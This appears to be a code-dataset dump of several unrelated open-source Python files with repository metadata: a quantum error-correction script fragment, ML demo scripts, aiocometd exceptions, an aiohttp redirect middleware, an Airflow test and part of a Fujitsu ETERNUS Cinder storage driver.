        # Map a logical-operator string (e.g. 'IX') to a base-4 index.
        # (Previously an unknown character silently reused the preceding
        # character's weight; it now counts as identity.)
        weights = {'I': 0, 'X': 1, 'Z': 2, 'Y': 3}
        idx = 0
        for i, ch in enumerate(logic):
            idx += weights.get(ch, 0) * (4 ** i)
        return idx

    n_syndrome = code.n - code.k
    # BUG FIX: np.int / np.str were removed in NumPy 1.24; use builtins.
    result = np.zeros([2 ** (num * n_syndrome), 4 ** code.k], dtype=int)
    binary = np.transpose(2 ** np.arange(num * n_syndrome)[::-1])
    # Infer the history length from the first CSV row (last column is the
    # logical error label).
    with open(file_name, 'r') as file:
        csv_reader = csv.reader(file, delimiter=',')
        line = next(csv_reader)
        l = (len(line) - 1) // (code.n - code.k)
    # BUG FIX: usecols was a generator expression; pass a concrete range so
    # np.loadtxt receives a reusable sequence of column indices.
    syndromes = np.loadtxt(file_name, dtype=int,
                           usecols=range((l - num) * n_syndrome, l * n_syndrome),
                           delimiter=",")
    logical_err = np.loadtxt(file_name, dtype=str, usecols=l * n_syndrome, delimiter=",")
    # Tally each (last-num-syndromes, logical-error) pair.
    for i in range(np.shape(syndromes)[0]):
        result[np.dot(syndromes[i], binary), logic_err_str_to_idx(logical_err[i])] += 1
    n = np.sum(result)
    # "Naive" assumes no logical error ever happened; "best" picks the most
    # likely logical error per syndrome (an upper bound for any decoder).
    naive = np.sum(result, axis=0)[0] / n
    best = np.sum(np.amax(result, axis=1)) / n
    print("Naive correction: {:4}%. Upper bound: {:4}%".format(100.0 * naive, 100.0 * best))
| 45.766234
| 118
| 0.61067
|
4a0221dd6fc2ff0a67e0ec758dbbe1faaf6fd7ce
| 1,352
|
py
|
Python
|
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from datetime import datetime
from deepreg.train import train
name = "paired_mrus_prostate"

# parser is used to simplify testing
# please run the script with --no-test flag to ensure non-testing mode
# for instance:
#   python script.py --no-test
parser = argparse.ArgumentParser()
parser.add_argument(
    "--test",
    help="Execute the script for test purpose",
    dest="test",
    action="store_true",
)
parser.add_argument(
    "--no-test",
    help="Execute the script for non-test purpose",
    dest="test",
    action="store_false",
)
# Default to test mode: a quick demo config is layered on unless --no-test.
parser.set_defaults(test=True)
args = parser.parse_args()

# Show the equivalent CLI invocation for users who prefer deepreg_train.
print(
    "\n\n\n\n\n"
    "=======================================================\n"
    "The training can also be launched using the following command.\n"
    "deepreg_train --gpu '0' "
    f"--config_path demos/{name}/{name}.yaml "
    f"--log_root demos/{name} "
    "--log_dir logs_train\n"
    "=======================================================\n"
    "\n\n\n\n\n"
)

log_root = f"demos/{name}"
# Timestamped log directory keeps successive runs separate.
log_dir = "logs_train/" + datetime.now().strftime("%Y%m%d-%H%M%S")
config_path = [f"demos/{name}/{name}.yaml"]
if args.test:
    # Test mode appends a lightweight config that shortens training.
    config_path.append("config/test/demo_paired.yaml")

train(
    gpu="0",
    config_path=config_path,
    gpu_allow_growth=True,
    ckpt_path="",
    log_root=log_root,
    log_dir=log_dir,
)
| 24.142857
| 70
| 0.612426
|
4a02227ec4d2343a4df6594c6d113412177ebb77
| 3,124
|
py
|
Python
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 14
|
2018-12-02T17:15:59.000Z
|
2022-02-27T12:37:50.000Z
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 14
|
2019-02-11T13:06:59.000Z
|
2022-02-14T18:04:16.000Z
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 16
|
2019-03-11T13:13:29.000Z
|
2022-02-27T11:30:59.000Z
|
"""Exception types
Exception hierarchy::
AiocometdException
ClientError
ClientInvalidOperation
TransportError
TransportInvalidOperation
TransportTimeoutError
TransportConnectionClosed
ServerError
"""
from typing import Optional, List, cast
from aiocometd import utils
class AiocometdException(Exception):
    """Base exception type.

    All exceptions of the package inherit from this class, so callers can
    catch every aiocometd error with a single ``except AiocometdException``.
    """
# Transport-layer errors (see the hierarchy in the module docstring).
class TransportError(AiocometdException):
    """Error during the transportation of messages"""


class TransportInvalidOperation(TransportError):
    """The requested operation can't be executed on the current state of the
    transport"""


class TransportTimeoutError(TransportError):
    """Transport timeout"""


class TransportConnectionClosed(TransportError):
    """The connection unexpectedly closed"""
class ServerError(AiocometdException):
    """CometD server side error

    Wraps the server's response message; the optional ``error`` field is
    parsed lazily through the accessor properties below.
    """
    def __init__(self, message: str,
                 response: Optional[utils.JsonObject]) -> None:
        """If the *response* contains an error field it gets parsed
        according to the \
        `specs <https://docs.cometd.org/current/reference/#_code_error_code>`_

        :param message: Error description
        :param response: Server response message
        """
        super().__init__(message, response)

    @property
    def message(self) -> str:
        """Error description"""
        description, _ = self.args
        return cast(str, description)

    @property
    def response(self) -> Optional[utils.JsonObject]:
        """Server response message"""
        _, server_response = self.args
        return cast(Optional[utils.JsonObject], server_response)

    @property
    def error(self) -> Optional[str]:
        """Error field in the :obj:`response`"""
        server_response = self.response
        if server_response is None:
            return None
        return server_response.get("error")

    @property
    def error_code(self) -> Optional[int]:
        """Error code part of the error code part of the `error\
        <https://docs.cometd.org/current/reference/#_code_error_code>`_, \
        message field"""
        return utils.get_error_code(self.error)

    @property
    def error_message(self) -> Optional[str]:
        """Description part of the `error\
        <https://docs.cometd.org/current/reference/#_code_error_code>`_, \
        message field"""
        return utils.get_error_message(self.error)

    @property
    def error_args(self) -> Optional[List[str]]:
        """Arguments part of the `error\
        <https://docs.cometd.org/current/reference/#_code_error_code>`_, \
        message field"""
        return utils.get_error_args(self.error)
# Client-side counterparts of the transport errors above.
class ClientError(AiocometdException):
    """CometD client side error"""


class ClientInvalidOperation(ClientError):
    """The requested operation can't be executed on the current state of the
    client"""
| 28.925926
| 78
| 0.664213
|
4a0222ac1b2bf5f61c0a48df0567bd73108325b1
| 1,744
|
py
|
Python
|
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Use the 1D data interpolation/extrapolation problem to benchmark convergence
variance. Comparison of training methods, EKF vs SGD.
"""
# Dependencies
from __future__ import division
import numpy as np;
npl = np.linalg
import matplotlib.pyplot as plt
import kalmann
# Get some noisy training data, a fun compact function
stdev = 0.05
U = np.arange(-10, 10, 0.2)
Y = np.exp(-U ** 2) + 0.5 * np.exp(-(U - 3) ** 2) + np.random.normal(0, stdev, len(U))

# Repeat fitting experiment many times
nepochs_ekf = 100
nepochs_sgd = 400
ekf_results = []
sgd_results = []
# BUG FIX: xrange is Python 2 only and raises NameError on Python 3.
for i in range(50):
    # Create two identical KNN's that will be trained differently
    knn_ekf = kalmann.KNN(nu=1, ny=1, nl=10, neuron='logistic')
    knn_sgd = kalmann.KNN(nu=1, ny=1, nl=10, neuron='logistic')

    # Train
    RMS_ekf, trcov = knn_ekf.train(nepochs=nepochs_ekf, U=U, Y=Y, method='ekf', P=0.5, Q=0, R=stdev ** 2, pulse_T=-1)
    RMS_sgd, _ = knn_sgd.train(nepochs=nepochs_sgd, U=U, Y=Y, method='sgd', step=0.05, pulse_T=-1)

    # Store the final-epoch RMS for each trainer
    ekf_results.append(RMS_ekf[-1])
    sgd_results.append(RMS_sgd[-1])

# Evaluation: compare the spread of final errors between the two trainers.
fig = plt.figure()
xlim = [0.33, 0.36]
fig.suptitle("Histogram of Final RMS Errors", fontsize=22)
ax = fig.add_subplot(2, 1, 1)
# BUG FIX: the `normed` kwarg was removed from Axes.hist in Matplotlib 3.1;
# `density` is the direct replacement.
ax.hist(ekf_results, 20, density=True)
ax.set_xlim(xlim)
ax.set_ylabel("Using EKF", fontsize=18)
ax.grid(True)
ax = fig.add_subplot(2, 1, 2)
ax.hist(sgd_results, 20, density=True)
ax.set_xlim(xlim)
ax.set_ylabel("Using SGD", fontsize=18)
ax.set_xlabel("RMS", fontsize=18)
ax.grid(True)

fig2 = plt.figure()
ax = fig2.add_subplot(1, 1, 1)
ax.set_title("Trace of Covariance During Training", fontsize=22)
# NOTE(review): trcov holds the covariance trace from the LAST of the 50
# EKF runs only -- confirm that plotting a single run is intended.
ax.plot(trcov)
ax.set_xlabel("Iteration", fontsize=16)
ax.grid(True)

plt.show()
| 28.590164
| 117
| 0.699541
|
4a0223357cbd3de9d7e70c061602f0df6a64c9f9
| 746
|
py
|
Python
|
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | 1
|
2017-05-24T14:34:54.000Z
|
2017-05-24T14:34:54.000Z
|
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | null | null | null |
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | null | null | null |
import logging
from aiohttp import web
log = logging.getLogger(__name__)
def fix_host(true_host: str):
    """Build an aiohttp middleware that permanently redirects any request
    whose Host header differs from *true_host* to the same path on
    *true_host*, logging the redirection."""
    @web.middleware
    async def fix_host_middleware(request, handler):
        # Fast path: the expected host, handle normally.
        if request.host == true_host:
            return await handler(request)
        requested_url = "{}://{}{}".format(
            request.scheme, request.host, request.path_qs
        )
        redirect_url = "{}://{}{}".format(
            request.scheme, true_host, request.path_qs
        )
        log.warning(
            "Unknown domain redirection: %s => %s",
            requested_url,
            redirect_url,
        )
        raise web.HTTPPermanentRedirect(redirect_url)

    return fix_host_middleware
| 27.62963
| 61
| 0.565684
|
4a022387b288bf84885123705a7d1c5eb34b0528
| 729
|
py
|
Python
|
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
import unittest
from unittest import mock
from airflow.hooks.base import BaseHook
from airflow.models import Connection, Variable
class Test(unittest.TestCase):
    """Verify Airflow resolves Variables and Connections from env vars."""

    def test_env(self):
        # Variable.get("key") is backed by the AIRFLOW_VAR_KEY env var.
        with mock.patch.dict("os.environ", {"AIRFLOW_VAR_KEY": "env-value"}):
            assert "env-value" == Variable.get("key")

    def test(self):
        conn = Connection(
            conn_type="gcpssh",
            login="cat",
            host="conn-host",
        )
        uri = conn.get_uri()
        # Connections resolve from AIRFLOW_CONN_<CONN_ID> env vars.
        with mock.patch.dict("os.environ", {"AIRFLOW_CONN_MY_CONN": uri}):
            fetched = BaseHook.get_connection(conn_id="my_conn")
            assert "cat" == fetched.login


if __name__ == '__main__':
    unittest.main()
| 27
| 74
| 0.62963
|
4a02238e937b86800b5f5133cea62020d6575fcf
| 86,610
|
py
|
Python
|
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 FUJITSU LIMITED
# Copyright (c) 2012 EMC Corporation.
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Cinder Volume driver for Fujitsu ETERNUS DX S3 series.
"""
import ast
import base64
import hashlib
import time
from defusedxml import ElementTree as ET
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _
from cinder import utils
from cinder.volume import configuration as conf
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
try:
import pywbem
pywbemAvailable = True
except ImportError:
pywbemAvailable = False
VOL_PREFIX = "FJosv_"
RAIDGROUP = 2
TPPOOL = 5
SNAPOPC = 4
OPC = 5
RETURN_TO_RESOURCEPOOL = 19
DETACH = 8
INITIALIZED = 2
UNSYNCHRONIZED = 3
BROKEN = 5
PREPARED = 11
REPL = "FUJITSU_ReplicationService"
STOR_CONF = "FUJITSU_StorageConfigurationService"
CTRL_CONF = "FUJITSU_ControllerConfigurationService"
STOR_HWID = "FUJITSU_StorageHardwareIDManagementService"
UNDEF_MSG = 'Undefined Error!!'
JOB_RETRIES = 60
JOB_INTERVAL_SEC = 10
# Error code keyword.
VOLUME_IS_BUSY = 32786
DEVICE_IS_BUSY = 32787
VOLUMENAME_IN_USE = 32788
COPYSESSION_NOT_EXIST = 32793
LUNAME_IN_USE = 4102
LUNAME_NOT_EXIST = 4097 # Only for InvokeMethod(HidePaths).
EC_REC = 3
FJ_ETERNUS_DX_OPT_opts = [
cfg.StrOpt('cinder_eternus_config_file',
default='/etc/cinder/cinder_fujitsu_eternus_dx.xml',
help='config file for cinder eternus_dx volume driver'),
]
POOL_TYPE_dic = {
RAIDGROUP: 'RAID_GROUP',
TPPOOL: 'Thinporvisioning_POOL',
}
OPERATION_dic = {
SNAPOPC: RETURN_TO_RESOURCEPOOL,
OPC: DETACH,
EC_REC: DETACH,
}
RETCODE_dic = {
'0': 'Success',
'1': 'Method Not Supported',
'4': 'Failed',
'5': 'Invalid Parameter',
'4096': 'Method Parameters Checked - Job Started',
'4097': 'Size Not Supported',
'4101': 'Target/initiator combination already exposed',
'4102': 'Requested logical unit number in use',
'32769': 'Maximum number of Logical Volume in a RAID group '
'has been reached',
'32770': 'Maximum number of Logical Volume in the storage device '
'has been reached',
'32771': 'Maximum number of registered Host WWN '
'has been reached',
'32772': 'Maximum number of affinity group has been reached',
'32773': 'Maximum number of host affinity has been reached',
'32785': 'The RAID group is in busy state',
'32786': 'The Logical Volume is in busy state',
'32787': 'The device is in busy state',
'32788': 'Element Name is in use',
'32792': 'No Copy License',
'32793': 'Session is not exist',
'32796': 'Quick Format Error',
'32801': 'The CA port is in invalid setting',
'32802': 'The Logical Volume is Mainframe volume',
'32803': 'The RAID group is not operative',
'32804': 'The Logical Volume is not operative',
'32808': 'No Thin Provisioning License',
'32809': 'The Logical Element is ODX volume',
'32811': 'This operation cannot be performed to the NAS resources',
'32812': 'This operation cannot be performed to the Storage Cluster '
'resources',
'32816': 'Fatal error generic',
'35302': 'Invalid LogicalElement',
'35304': 'LogicalElement state error',
'35316': 'Multi-hop error',
'35318': 'Maximum number of multi-hop has been reached',
'35324': 'RAID is broken',
'35331': 'Maximum number of session has been reached(per device)',
'35333': 'Maximum number of session has been reached(per SourceElement)',
'35334': 'Maximum number of session has been reached(per TargetElement)',
'35335': 'Maximum number of Snapshot generation has been reached '
'(per SourceElement)',
'35346': 'Copy table size is not setup',
'35347': 'Copy table size is not enough',
}
CONF.register_opts(FJ_ETERNUS_DX_OPT_opts, group=conf.SHARED_CONF_GROUP)
class FJDXCommon(object):
"""Common code that does not depend on protocol."""
VERSION = "1.3.0"
stats = {
'driver_version': VERSION,
'free_capacity_gb': 0,
'reserved_percentage': 0,
'storage_protocol': None,
'total_capacity_gb': 0,
'vendor_name': 'FUJITSU',
'QoS_support': False,
'volume_backend_name': None,
}
def __init__(self, prtcl, configuration=None):
    """Initialize common ETERNUS driver state.

    :param prtcl: transport protocol; the rest of this class branches on
        'fc' and 'iSCSI'.
    :param configuration: cinder driver configuration object; the
        ETERNUS-specific options are appended to it.
    """
    self.pywbemAvailable = pywbemAvailable
    self.protocol = prtcl
    self.configuration = configuration
    self.configuration.append_config_values(FJ_ETERNUS_DX_OPT_opts)

    if prtcl == 'iSCSI':
        # Get iSCSI ipaddress from driver configuration file.
        self.configuration.iscsi_ip_address = (
            self._get_drvcfg('EternusISCSIIP'))
@staticmethod
def get_driver_options():
    """Return the ETERNUS DX driver-specific oslo.config options."""
    return FJ_ETERNUS_DX_OPT_opts
def create_volume(self, volume):
"""Create volume on ETERNUS."""
LOG.debug('create_volume, '
'volume id: %(vid)s, volume size: %(vsize)s.',
{'vid': volume['id'], 'vsize': volume['size']})
self.conn = self._get_eternus_connection()
volumesize = int(volume['size']) * units.Gi
volumename = self._create_volume_name(volume['id'])
LOG.debug('create_volume, volumename: %(volumename)s, '
'volumesize: %(volumesize)u.',
{'volumename': volumename,
'volumesize': volumesize})
# get poolname from driver configuration file
eternus_pool = self._get_drvcfg('EternusPool')
# Existence check the pool
pool = self._find_pool(eternus_pool)
if 'RSP' in pool['InstanceID']:
pooltype = RAIDGROUP
else:
pooltype = TPPOOL
configservice = self._find_eternus_service(STOR_CONF)
if configservice is None:
msg = (_('create_volume, volume: %(volume)s, '
'volumename: %(volumename)s, '
'eternus_pool: %(eternus_pool)s, '
'Storage Configuration Service not found.')
% {'volume': volume,
'volumename': volumename,
'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_volume, '
'CreateOrModifyElementFromStoragePool, '
'ConfigService: %(service)s, '
'ElementName: %(volumename)s, '
'InPool: %(eternus_pool)s, '
'ElementType: %(pooltype)u, '
'Size: %(volumesize)u.',
{'service': configservice,
'volumename': volumename,
'eternus_pool': eternus_pool,
'pooltype': pooltype,
'volumesize': volumesize})
# Invoke method for create volume
rc, errordesc, job = self._exec_eternus_service(
'CreateOrModifyElementFromStoragePool',
configservice,
ElementName=volumename,
InPool=pool,
ElementType=self._pywbem_uint(pooltype, '16'),
Size=self._pywbem_uint(volumesize, '64'))
if rc == VOLUMENAME_IN_USE: # Element Name is in use
LOG.warning('create_volume, '
'volumename: %(volumename)s, '
'Element Name is in use.',
{'volumename': volumename})
vol_instance = self._find_lun(volume)
element = vol_instance
elif rc != 0:
msg = (_('create_volume, '
'volumename: %(volumename)s, '
'poolname: %(eternus_pool)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'volumename': volumename,
'eternus_pool': eternus_pool,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
else:
element = job['TheElement']
# Get eternus model name
try:
systemnamelist = (
self._enum_eternus_instances('FUJITSU_StorageProduct'))
except Exception:
msg = (_('create_volume, '
'volume: %(volume)s, '
'EnumerateInstances, '
'cannot connect to ETERNUS.')
% {'volume': volume})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'Backend: %(backend)s, '
'Pool Name: %(eternus_pool)s, '
'Pool Type: %(pooltype)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'backend': systemnamelist[0]['IdentifyingNumber'],
'eternus_pool': eternus_pool,
'pooltype': POOL_TYPE_dic[pooltype]})
# Create return value.
element_path = {
'classname': element.classname,
'keybindings': {
'CreationClassName': element['CreationClassName'],
'SystemName': element['SystemName'],
'DeviceID': element['DeviceID'],
'SystemCreationClassName': element['SystemCreationClassName']
}
}
volume_no = "0x" + element['DeviceID'][24:28]
metadata = {'FJ_Backend': systemnamelist[0]['IdentifyingNumber'],
'FJ_Volume_Name': volumename,
'FJ_Volume_No': volume_no,
'FJ_Pool_Name': eternus_pool,
'FJ_Pool_Type': POOL_TYPE_dic[pooltype]}
return (element_path, metadata)
def create_volume_from_snapshot(self, volume, snapshot):
    """Creates a volume from a snapshot.

    Creates a new volume, then starts a local clone (OPC) copy session
    from the snapshot's SDV to it via _create_local_cloned_volume.

    :param volume: target volume dict (id, size).
    :param snapshot: source snapshot dict; must exist on the array.
    :returns: (element_path, metadata) tuple from create_volume.
    :raises VolumeBackendAPIException: if the source snapshot is missing
        on the array or the new volume instance cannot be fetched.
    """
    LOG.debug('create_volume_from_snapshot, '
              'volume id: %(vid)s, volume size: %(vsize)s, '
              'snapshot id: %(sid)s.',
              {'vid': volume['id'], 'vsize': volume['size'],
               'sid': snapshot['id']})
    self.conn = self._get_eternus_connection()
    source_volume_instance = self._find_lun(snapshot)

    # Check the existence of source volume.
    if source_volume_instance is None:
        msg = _('create_volume_from_snapshot, '
                'Source Volume does not exist in ETERNUS.')
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    # Create volume for the target volume.
    (element_path, metadata) = self.create_volume(volume)
    # Re-fetch the freshly created volume as a CIM instance so it can be
    # used as the copy target.
    target_volume_instancename = self._create_eternus_instance_name(
        element_path['classname'], element_path['keybindings'])

    try:
        target_volume_instance = (
            self._get_eternus_instance(target_volume_instancename))
    except Exception:
        msg = (_('create_volume_from_snapshot, '
                 'target volume instancename: %(volume_instancename)s, '
                 'Get Instance Failed.')
               % {'volume_instancename': target_volume_instancename})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    self._create_local_cloned_volume(target_volume_instance,
                                     source_volume_instance)

    return (element_path, metadata)
def create_cloned_volume(self, volume, src_vref):
    """Create clone of the specified volume.

    Same flow as create_volume_from_snapshot, but the copy source is an
    existing volume instead of a snapshot.

    :param volume: target volume dict (id, size).
    :param src_vref: source volume dict; must exist on the array.
    :returns: (element_path, metadata) tuple from create_volume.
    :raises VolumeBackendAPIException: if the source volume is missing on
        the array or the new volume instance cannot be fetched.
    """
    LOG.debug('create_cloned_volume, '
              'tgt: (%(tid)s, %(tsize)s), src: (%(sid)s, %(ssize)s).',
              {'tid': volume['id'], 'tsize': volume['size'],
               'sid': src_vref['id'], 'ssize': src_vref['size']})
    self.conn = self._get_eternus_connection()
    source_volume_instance = self._find_lun(src_vref)

    if source_volume_instance is None:
        msg = _('create_cloned_volume, '
                'Source Volume does not exist in ETERNUS.')
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    (element_path, metadata) = self.create_volume(volume)
    # Re-fetch the freshly created volume as a CIM instance so it can be
    # used as the copy target.
    target_volume_instancename = self._create_eternus_instance_name(
        element_path['classname'], element_path['keybindings'])

    try:
        target_volume_instance = (
            self._get_eternus_instance(target_volume_instancename))
    except Exception:
        msg = (_('create_cloned_volume, '
                 'target volume instancename: %(volume_instancename)s, '
                 'Get Instance Failed.')
               % {'volume_instancename': target_volume_instancename})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    self._create_local_cloned_volume(target_volume_instance,
                                     source_volume_instance)

    return (element_path, metadata)
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _create_local_cloned_volume(self, tgt_vol_instance, src_vol_instance):
    """Create local clone of the specified volume.

    Starts a copy session (CreateElementReplica with SyncType=8 --
    presumably the local-clone sync type; confirm against the SMI-S
    replication profile) from source to the already-created target.

    :param tgt_vol_instance: CIM instance of the copy destination volume.
    :param src_vol_instance: CIM instance of the copy source volume.
    :raises VolumeBackendAPIException: if the Replication Service is not
        found or CreateElementReplica returns a non-zero code.
    """
    s_volumename = src_vol_instance['ElementName']
    t_volumename = tgt_vol_instance['ElementName']

    LOG.debug('_create_local_cloned_volume, '
              'tgt volume name: %(t_volumename)s, '
              'src volume name: %(s_volumename)s, ',
              {'t_volumename': t_volumename,
               's_volumename': s_volumename})

    # Get replicationservice for CreateElementReplica.
    repservice = self._find_eternus_service(REPL)
    if repservice is None:
        msg = _('_create_local_cloned_volume, '
                'Replication Service not found.')
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    # Invoke method for create cloned volume from volume.
    rc, errordesc, job = self._exec_eternus_service(
        'CreateElementReplica',
        repservice,
        SyncType=self._pywbem_uint(8, '16'),
        SourceElement=src_vol_instance.path,
        TargetElement=tgt_vol_instance.path)

    if rc != 0:
        msg = (_('_create_local_cloned_volume, '
                 'volumename: %(volumename)s, '
                 'sourcevolumename: %(sourcevolumename)s, '
                 'source volume instance: %(source_volume)s, '
                 'target volume instance: %(target_volume)s, '
                 'Return code: %(rc)lu, '
                 'Error: %(errordesc)s.')
               % {'volumename': t_volumename,
                  'sourcevolumename': s_volumename,
                  'source_volume': src_vol_instance.path,
                  'target_volume': tgt_vol_instance.path,
                  'rc': rc,
                  'errordesc': errordesc})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    LOG.debug('_create_local_cloned_volume, out: %(rc)s, %(job)s.',
              {'rc': rc, 'job': job})
def delete_volume(self, volume):
    """Delete volume on ETERNUS."""
    LOG.debug('delete_volume, volume id: %s.', volume['id'])

    self.conn = self._get_eternus_connection()

    # First pass tears down host affinity and copy sessions; if the
    # volume never existed on the array, report that to the caller.
    if not self._delete_volume_setting(volume):
        LOG.debug('delete_volume, volume not found in 1st check.')
        return False

    # Check volume existence on ETERNUS again
    # because volume is deleted when SnapOPC copysession is deleted.
    vol_instance = self._find_lun(volume)
    if vol_instance is None:
        LOG.debug('delete_volume, volume not found in 2nd check, '
                  'but no problem.')
        return True

    self._delete_volume(vol_instance)
    return True
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _delete_volume_setting(self, volume):
    """Delete volume setting (HostAffinity, CopySession) on ETERNUS.

    Removes any leftover host-affinity mapping, waits out copy sessions
    where this volume is the source, and deletes sessions where it is
    the target.

    :param volume: cinder volume dict.
    :returns: False if the volume does not exist on the array, True once
        all settings are cleared.
    """
    LOG.debug('_delete_volume_setting, volume id: %s.', volume['id'])

    # Check the existence of volume.
    volumename = self._create_volume_name(volume['id'])
    vol_instance = self._find_lun(volume)
    if vol_instance is None:
        LOG.info('_delete_volume_setting, volumename:%(volumename)s, '
                 'volume not found on ETERNUS.',
                 {'volumename': volumename})
        return False

    # Delete host-affinity setting remained by unexpected error.
    self._unmap_lun(volume, None, force=True)

    # Check copy session relating to target volume.
    cpsessionlist = self._find_copysession(vol_instance)
    delete_copysession_list = []
    wait_copysession_list = []

    for cpsession in cpsessionlist:
        LOG.debug('_delete_volume_setting, '
                  'volumename: %(volumename)s, '
                  'cpsession: %(cpsession)s.',
                  {'volumename': volumename,
                   'cpsession': cpsession})

        if cpsession['SyncedElement'] == vol_instance.path:
            # Copy target : other_volume --(copy)--> vol_instance
            delete_copysession_list.append(cpsession)
        elif cpsession['SystemElement'] == vol_instance.path:
            # Copy source : vol_instance --(copy)--> other volume
            wait_copysession_list.append(cpsession)

    LOG.debug('_delete_volume_setting, '
              'wait_cpsession: %(wait_cpsession)s, '
              'delete_cpsession: %(delete_cpsession)s.',
              {'wait_cpsession': wait_copysession_list,
               'delete_cpsession': delete_copysession_list})

    # Sessions copying *from* this volume must finish before the volume
    # can go away; sessions copying *to* it are simply torn down.
    for cpsession in wait_copysession_list:
        self._wait_for_copy_complete(cpsession)

    for cpsession in delete_copysession_list:
        self._delete_copysession(cpsession)

    LOG.debug('_delete_volume_setting, '
              'wait_cpsession: %(wait_cpsession)s, '
              'delete_cpsession: %(delete_cpsession)s, complete.',
              {'wait_cpsession': wait_copysession_list,
               'delete_cpsession': delete_copysession_list})
    return True
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _delete_volume(self, vol_instance):
    """Delete volume on ETERNUS.

    Returns the volume's storage to its pool via the SMI-S
    ReturnToStoragePool method.

    :param vol_instance: CIM instance of the volume to delete.
    :raises VolumeBackendAPIException: if the Storage Configuration
        Service is not found or ReturnToStoragePool returns non-zero.
    """
    LOG.debug('_delete_volume, volume name: %s.',
              vol_instance['ElementName'])

    volumename = vol_instance['ElementName']
    configservice = self._find_eternus_service(STOR_CONF)
    if configservice is None:
        msg = (_('_delete_volume, volumename: %(volumename)s, '
                 'Storage Configuration Service not found.')
               % {'volumename': volumename})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    LOG.debug('_delete_volume, volumename: %(volumename)s, '
              'vol_instance: %(vol_instance)s, '
              'Method: ReturnToStoragePool.',
              {'volumename': volumename,
               'vol_instance': vol_instance.path})

    # Invoke method for delete volume
    rc, errordesc, job = self._exec_eternus_service(
        'ReturnToStoragePool',
        configservice,
        TheElement=vol_instance.path)

    if rc != 0:
        msg = (_('_delete_volume, volumename: %(volumename)s, '
                 'Return code: %(rc)lu, '
                 'Error: %(errordesc)s.')
               % {'volumename': volumename,
                  'rc': rc,
